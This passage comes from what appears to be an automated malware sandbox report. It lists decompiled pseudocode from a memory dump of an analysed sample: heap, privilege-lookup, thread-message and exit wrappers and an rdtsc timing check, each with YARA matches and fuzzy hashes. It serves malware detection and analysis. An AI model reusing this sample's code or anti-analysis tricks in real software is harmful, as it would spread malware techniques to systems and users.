					_t34 = E00406D10(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}





















                                                                          0x004086ab
                                                                          0x004086b3
                                                                          0x004086b5
                                                                          0x004086ba
                                                                          0x004086bf
                                                                          0x004086d2
                                                                          0x004086d7
                                                                          0x004086e0
                                                                          0x004086ec
                                                                          0x004086ff
                                                                          0x00408704
                                                                          0x00408707
                                                                          0x00408710
                                                                          0x00408719
                                                                          0x0040871e
                                                                          0x00408722
                                                                          0x00408725
                                                                          0x00408727
                                                                          0x0040872c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040872e
                                                                          0x00408732
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00408734
                                                                          0x00000000
                                                                          0x00408732
                                                                          0x00408736
                                                                          0x00408739
                                                                          0x0040873f
                                                                          0x00408741
                                                                          0x00408747
                                                                          0x0040874b
                                                                          0x0040874c
                                                                          0x00408751
                                                                          0x00408754
                                                                          0x00408761
                                                                          0x0040876c
                                                                          0x0040876e
                                                                          0x00408774
                                                                          0x00408778
                                                                          0x0040877b
                                                                          0x0040877b
                                                                          0x00408782
                                                                          0x00408785
                                                                          0x0040878a
                                                                          0x00408797
                                                                          0x004086c6
                                                                          0x004086c6
                                                                          0x004086c6

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9d3662c9d9ed3c3facb10e0fc7046eba54cc15a70dcd97eba515afb8798193ec
                                                                          • Instruction ID: 5b451ef1e1030d6b8b923f1ee026740920f396712fac6818ff779677412e5d75
                                                                          • Opcode Fuzzy Hash: 9d3662c9d9ed3c3facb10e0fc7046eba54cc15a70dcd97eba515afb8798193ec
                                                                          • Instruction Fuzzy Hash: E8213CB2D4020857CB20DA649E52AEF73BC9F50305F14047FF989A3181F639AB498BB5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406EB0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 73%
                                                                          			E00406EB0(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;

				_v68 = 0;
				E004196D0( &_v67, 0, 0x3f);
				E0041A2B0( &_v68, 3);
				_push( &_v68);
				_t12 = E00409900(__ebx,  &_v68,  &_v68, _a4 + 0x1c); // executed
				_t13 = E00413820(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E00409060(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}











                                                                          0x00406ebf
                                                                          0x00406ec3
                                                                          0x00406ece
                                                                          0x00406ed9
                                                                          0x00406ede
                                                                          0x00406eee
                                                                          0x00406ef3
                                                                          0x00406efa
                                                                          0x00406efd
                                                                          0x00406f0a
                                                                          0x00406f0c
                                                                          0x00406f0e
                                                                          0x00406f2b
                                                                          0x00406f2b
                                                                          0x00000000
                                                                          0x00406f2d
                                                                          0x00406f32

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 00406F0A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: 86aabadf8e07445ceb82468d69cbbbdf953cdd515357127d60cc95a49993ee3a
                                                                          • Instruction ID: 888472887a83f66ab8ad38f5b4f0bbb5bc802af05fddaa295ed7b2bc8018e583
                                                                          • Opcode Fuzzy Hash: 86aabadf8e07445ceb82468d69cbbbdf953cdd515357127d60cc95a49993ee3a
                                                                          • Instruction Fuzzy Hash: 0801FC71A4021977E720A6959C03FFF776C9B00B54F050019FF04BA2C1D6A8690586F9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00417EA2, Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 58%
                                                                          			E00417EA2(void* __eax, signed int __edi, intOrPtr _a8, void* _a12, long _a16, void* _a20) {
				void* _v117;
				char _t13;
				signed int _t20;

				_t20 = __edi & 0x0000001d;
				_pop(es);
				asm("cdq");
				asm("salc");
				_t10 = _a8;
				_t4 = _t10 + 0xc74; // 0xc74
				E004187A0(_t20, _a8, _t4,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35);
				_t13 = RtlFreeHeap(_a12, _a16, _a20); // executed
				return _t13;
			}






                                                                          0x00417ea2
                                                                          0x00417ea5
                                                                          0x00417ea6
                                                                          0x00417eac
                                                                          0x00417eb3
                                                                          0x00417ebf
                                                                          0x00417ec7
                                                                          0x00417edd
                                                                          0x00417ee1

                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,004088D3,?,?,004088D3,00000060,00000000,00000000,?,?,004088D3,?,00000000), ref: 00417EDD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: 45ebb97fb713e89da29460f52c0ad63fe5298be21949fde1a6053f3c864fc969
                                                                          • Instruction ID: 83b470742eb028de04bc8783c0683660616be3775c7019da94522d465f5f0661
                                                                          • Opcode Fuzzy Hash: 45ebb97fb713e89da29460f52c0ad63fe5298be21949fde1a6053f3c864fc969
                                                                          • Instruction Fuzzy Hash: 7CE0EDB62006006BCB14DF64CC44EE73769AF84360F15469EF91C9B242C131E8008FA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418010, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00418010(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004187A0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                          0x0041802a
                                                                          0x00418040
                                                                          0x00418044

                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CCD2,0040CCD2,00000041,00000000,?,00408945), ref: 00418040
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                          • Instruction ID: 5cfd69cbbc6ede77ef209f8a566c072b9237ec095735b76ba4602e80bdd48004
                                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                          • Instruction Fuzzy Hash: 59E01AB5200208ABDB10DF49CC85EE737ADAF88650F118559BA0C57241C934E8108BF5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00417E70, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00417E70(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004187A0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                          0x00417e87
                                                                          0x00417e9d
                                                                          0x00417ea1

                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00412F06,?,0041367F,0041367F,?,00412F06,?,?,?,?,?,00000000,004088D3,?), ref: 00417E9D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                          • Instruction ID: 20c7fa2d07da71b037805fbd169f51d075d0aac182e23fb79b8b35d4a6b2ea94
                                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                          • Instruction Fuzzy Hash: 28E012B5210208ABDB14EF99CC41EA777ADAF88654F158559BA185B282CA30F9108AB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00417EB0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00417EB0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004187A0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                          0x00417ebf
                                                                          0x00417ec7
                                                                          0x00417edd
                                                                          0x00417ee1

                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,004088D3,?,?,004088D3,00000060,00000000,00000000,?,?,004088D3,?,00000000), ref: 00417EDD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                          • Instruction ID: 66b08c9724e68347fe05f282e0e0f8c5d650fbbc193dc541ddd2391e3703caa8
                                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                          • Instruction Fuzzy Hash: 98E01AB5210204ABD714DF59CC45EA777ADAF88750F114559B91857241C630E9108AB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00417EF0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00417EF0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004187A0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                          0x00417ef3
                                                                          0x00417f0a
                                                                          0x00417f18

                                                                          APIs
                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00417F18
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-0
                                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                          • Instruction ID: 002a88aae995011297bdf2d8699e4d7ccd498d4f6789bab7df04d252c2147d95
                                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                          • Instruction Fuzzy Hash: 2CD012756102147BD620DB99CC85FD7779CDF48750F158469BA1C5B241C531BA0086E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 21954efb4cd0ef6db9d4f28acc0c4a97c68ee6f8bfd87ca6c2f8808d7d2c21c0
                                                                          • Instruction ID: 7b100fa50be80b19947c4f08beb47725f44191e6fe6925f935013f63634a3957
                                                                          • Opcode Fuzzy Hash: 21954efb4cd0ef6db9d4f28acc0c4a97c68ee6f8bfd87ca6c2f8808d7d2c21c0
                                                                          • Instruction Fuzzy Hash: 42B09B71D454C5C5D711D760470CB17790177D0751F16C066D1020655B4779C495F6B5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 004066DA, Relevance: .0, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5fc4063faf178c15f86f43e534f03d0bbfe14433050a06db265f74cacc30ae9a
                                                                          • Instruction ID: 436e52ccedde224da08891250da84f26317c574beea3ebc79f06f2de69da82b0
                                                                          • Opcode Fuzzy Hash: 5fc4063faf178c15f86f43e534f03d0bbfe14433050a06db265f74cacc30ae9a
                                                                          • Instruction Fuzzy Hash: 09C08033D1D1C801E3115D2A6C513F4FB66D7D3175D4C12DFDC0457005D447C45A4348
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00415044, Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8734d5e27138ea4de313a5d1e6ce898ee8abf02ba727e3dabfcfe93da63e9560
                                                                          • Instruction ID: 955dc78854857abc1463a36d597cd739ed5f420deea015f95640a69ffb740b58
                                                                          • Opcode Fuzzy Hash: 8734d5e27138ea4de313a5d1e6ce898ee8abf02ba727e3dabfcfe93da63e9560
                                                                          • Instruction Fuzzy Hash: 9CC04C36A49148069A145D58E8511F8F725A54B025E853293CE49B3906A2429826865A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00415C88, Relevance: .0, Instructions: 13COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 58%
                                                                          			E00415C88(void* __eax, signed char* __edi) {

				asm("invalid");
				 *__edi =  *__edi << 0x51;
				return __eax;
			}



                                                                          0x00415c88
                                                                          0x00415c8c
                                                                          0x00415c99

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 05a9406ca2ad050a3d2bf800e3c2890b23168ea1507e41a1aee88e5b2195ef57
                                                                          • Instruction ID: 76c7c7b3ec6646a14ce208649debc1bebcefff04c799dd7230192bd0cd9c69e1
                                                                          • Opcode Fuzzy Hash: 05a9406ca2ad050a3d2bf800e3c2890b23168ea1507e41a1aee88e5b2195ef57
                                                                          • Instruction Fuzzy Hash: 5CB09213F89A6502D618888A78012B1F7A0878B166E2072B2CE0CA35103182C02101CA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC98A0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 258c67ab011a59059ca3ff96c2801e901b62cdf128343c75b4296945920a6f89
                                                                          • Instruction ID: b2f0ab9c4690d675d3f3de18fe3c0a63c91c6ddffdc191f46a0b8e3c563ae595
                                                                          • Opcode Fuzzy Hash: 258c67ab011a59059ca3ff96c2801e901b62cdf128343c75b4296945920a6f89
                                                                          • Instruction Fuzzy Hash: CA90026135100402D20261594414606100AD7D1385F95C023E1415565E86668953F172
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FCB040, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f8db39c413e74695d395be77ce8c811a24d654990b559d05473aaf161d052c77
                                                                          • Instruction ID: 9268f0cefb9c56e93c5f91425bafefed7e70bbf3793d797c78b223a6cd77def6
                                                                          • Opcode Fuzzy Hash: f8db39c413e74695d395be77ce8c811a24d654990b559d05473aaf161d052c77
                                                                          • Instruction Fuzzy Hash: 8A9002A1651140434640B15948044066016A7E1341795C132A0445570D86A98855F2A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9820, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0908f1fbe2a07be7c0da3685df23767cad5f0be2fdf9eae464c08739d8f679c9
                                                                          • Instruction ID: f6054e55285e25f197a9c7214e1ab927431dae7d68ba23a7e5a6e8246ec23ec6
                                                                          • Opcode Fuzzy Hash: 0908f1fbe2a07be7c0da3685df23767cad5f0be2fdf9eae464c08739d8f679c9
                                                                          • Instruction Fuzzy Hash: B790027129100402D24171594404606100AA7D0381F95C023A0415564F86968A56FAA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC99D0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e3209b2c7ea5ea1ad64a70e9c2aba9f5b66078dc8611b21e35f9fbc6153e8dd1
                                                                          • Instruction ID: 9f2d640c069ee5cb82fbea2050d42edb994d033f674fd8ab6ad9fc0b600305d1
                                                                          • Opcode Fuzzy Hash: e3209b2c7ea5ea1ad64a70e9c2aba9f5b66078dc8611b21e35f9fbc6153e8dd1
                                                                          • Instruction Fuzzy Hash: 149002A126100042D20461594404706104697E1341F55C023A2145564DC56A8C61B165
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9950, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ad6ebccfcfcd1b7d494ce97029ce21ac51a5a5ae44711d783372bb6302b00139
                                                                          • Instruction ID: b94ded2e5e592a018a6b446790c1081e4800d1f664c00d1fb0797d726c8dabed
                                                                          • Opcode Fuzzy Hash: ad6ebccfcfcd1b7d494ce97029ce21ac51a5a5ae44711d783372bb6302b00139
                                                                          • Instruction Fuzzy Hash: C39002A125140403D24065594804607100697D0342F55C022A2055565F8A6A8C51B175
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9A80, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 551a1399284d85235ce3842e7b5d6a9919196cbc2971f795a7464da37357aecc
                                                                          • Instruction ID: 74dbf7ccd08bc459f92bba5e58affdddd3bf2e5063043a9485a786ebd775fd3b
                                                                          • Opcode Fuzzy Hash: 551a1399284d85235ce3842e7b5d6a9919196cbc2971f795a7464da37357aecc
                                                                          • Instruction Fuzzy Hash: 6490026125144442D24062594804B0F510697E1342F95C02AA4147564DC9568855B761
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9A10, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 16f90a46c6ee0e9ee4fd2a62c1f3b341e22ecaae8f7efedc3723377d91ae608a
                                                                          • Instruction ID: 415f57caa815edf4fdd8634354012b96d3a06aa24bef0cd00aa1f1c35e8895e3
                                                                          • Opcode Fuzzy Hash: 16f90a46c6ee0e9ee4fd2a62c1f3b341e22ecaae8f7efedc3723377d91ae608a
                                                                          • Instruction Fuzzy Hash: 9990027125140402D20061594808747100697D0342F55C022A5155565F86A6C891B571
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FCA3B0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3b06fecb3c13a71ad7e841858dc4af8f14ac9cd692ee5978fd7870487ff5891a
                                                                          • Instruction ID: 6435b287fabf4e69c50c51539bb79af96ce3e57e0302e50742b92cbea1b275c4
                                                                          • Opcode Fuzzy Hash: 3b06fecb3c13a71ad7e841858dc4af8f14ac9cd692ee5978fd7870487ff5891a
                                                                          • Instruction Fuzzy Hash: 1890027125144002D2407159844460B6006A7E0341F55C422E0416564D86568856F261
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9B00, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 405b9671a7b0ba88df1adb9ea80c1e5649fbbab80bb7ce9938d8af479b5e458c
                                                                          • Instruction ID: 72fdc52100ba8c32d678f310e552cfe4b9d9c23e9cfe47ee3ddf554bb16ac800
                                                                          • Opcode Fuzzy Hash: 405b9671a7b0ba88df1adb9ea80c1e5649fbbab80bb7ce9938d8af479b5e458c
                                                                          • Instruction Fuzzy Hash: 1A90026129100802D240715984147071007D7D0741F55C022A0015564E86578965B6F1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC95F0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4e1d8262fe5c25867c5fa1eebd7791e6e21d834953b4c8dffca582b413f409d8
                                                                          • Instruction ID: 6819920751997e190d2ae59ad5499617628aa4909b60d3f59d6b60a2990f6b6c
                                                                          • Opcode Fuzzy Hash: 4e1d8262fe5c25867c5fa1eebd7791e6e21d834953b4c8dffca582b413f409d8
                                                                          • Instruction Fuzzy Hash: D790027125100802D20461594804686100697D0341F55C022A6015665F96A68891B171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9560, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f583904fb1ff482396b9d44a40ff3f188416ff30f767436283b5c04a109f145a
                                                                          • Instruction ID: 38dd9429bfcb4ea077b34dcdcd749cffaaf1fc94fcf14d42d07c326588079325
                                                                          • Opcode Fuzzy Hash: f583904fb1ff482396b9d44a40ff3f188416ff30f767436283b5c04a109f145a
                                                                          • Instruction Fuzzy Hash: 5C900265271000020245A559060450B1446A7D6391795C026F14075A0DC6628865B361
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FCAD30, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b1cb0cabf770bdc801dd65819e135b6aab7d8c66cb56581018d0fd361b4658ea
                                                                          • Instruction ID: f5bdc5a7823d540fbcc549b697b93e8f24ad81916a7a5279d8b530b7386b49c0
                                                                          • Opcode Fuzzy Hash: b1cb0cabf770bdc801dd65819e135b6aab7d8c66cb56581018d0fd361b4658ea
                                                                          • Instruction Fuzzy Hash: D6900271A55000129240715948146465007A7E0781F59C022A0505564D89958A55B3E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9520, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e3a7b3de91388e1ab3d314a8b38e8bcb1ddddaef69bdd67d01693f0177d4c577
                                                                          • Instruction ID: 177dce11f5e56ae28ebbb1c03630b1d3a72f636bed59ee5d13a0f741fb03eb8f
                                                                          • Opcode Fuzzy Hash: e3a7b3de91388e1ab3d314a8b38e8bcb1ddddaef69bdd67d01693f0177d4c577
                                                                          • Instruction Fuzzy Hash: 5B9002E1251140924600A2598404B0A550697E0341F55C027E1045570DC5668851F175
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC96D0, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 455f435e94ed7b600b83d9040964e5d4775a7eed605675b78afd8b95137c88f8
                                                                          • Instruction ID: c08d21ce67dfebab94927ec4e7c112d5004d7b5439bd37f8866e5ef8be9ac3cb
                                                                          • Opcode Fuzzy Hash: 455f435e94ed7b600b83d9040964e5d4775a7eed605675b78afd8b95137c88f8
                                                                          • Instruction Fuzzy Hash: 5C90027125100842D20061594404B46100697E0341F55C027A0115664E8656C851B561
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9650, Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cf2de91fdac154fbd3c8d5edd76494d7645d441513a44d7e1b108b4a990e1fbc
                                                                          • Instruction ID: f62c7be4c075e7171f541d963d04d45994ef9548d498ca8f4119d2e39e84b19c
                                                                          • Opcode Fuzzy Hash: cf2de91fdac154fbd3c8d5edd76494d7645d441513a44d7e1b108b4a990e1fbc
                                                                          • Instruction Fuzzy Hash: 1790027125504842D24071594404A46101697D0345F55C022A00556A4E96668D55F6A1
                                                                          Uniqueness

